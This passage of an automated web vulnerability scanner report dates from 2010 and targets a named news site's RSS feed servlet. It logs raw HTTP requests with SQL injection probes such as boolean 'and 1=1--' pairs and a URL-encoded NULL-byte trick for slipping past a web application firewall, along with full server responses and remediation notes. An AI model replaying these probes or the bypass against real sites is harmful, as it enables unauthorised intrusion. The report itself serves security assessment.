<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.22. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200743.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200743.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200743.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:01 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200743.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:02 GMT
Content-Length: 0
Connection: close


1.23. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200744.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200744.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 62668673%20or%201%3d1--%20 and 62668673%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56862668673%20or%201%3d1--%20/200744.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:07 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56862668673%20or%201%3d2--%20/200744.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.24. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200746.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200746.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:56 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:18:57 GMT
Date: Tue, 07 Dec 2010 23:18:57 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.25. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200746.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200746.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 23993338%20or%201%3d1--%20 and 23993338%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56823993338%20or%201%3d1--%20/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:03 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56823993338%20or%201%3d2--%20/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.26. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200747.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200747.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 18638958%20or%201%3d1--%20 and 18638958%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56818638958%20or%201%3d1--%20/200747.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:09 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56818638958%20or%201%3d2--%20/200747.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.27. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200747.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200747.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200747.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:12 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200747.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:12 GMT
Content-Length: 12372
Connection: close
Set-Cookie: JSESSIONID=EDZ5AFGTMHV4ACUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.28. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200748.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:19 GMT
Date: Tue, 07 Dec 2010 23:19:19 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.29. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200748.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:29 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:29 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.30. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200748.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200748.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200748.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:33 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200748.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:34 GMT
Content-Length: 22692
Connection: close
Set-Cookie: JSESSIONID=GL5CPID3GOAV2CUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.31. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200749.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200749.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200749.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
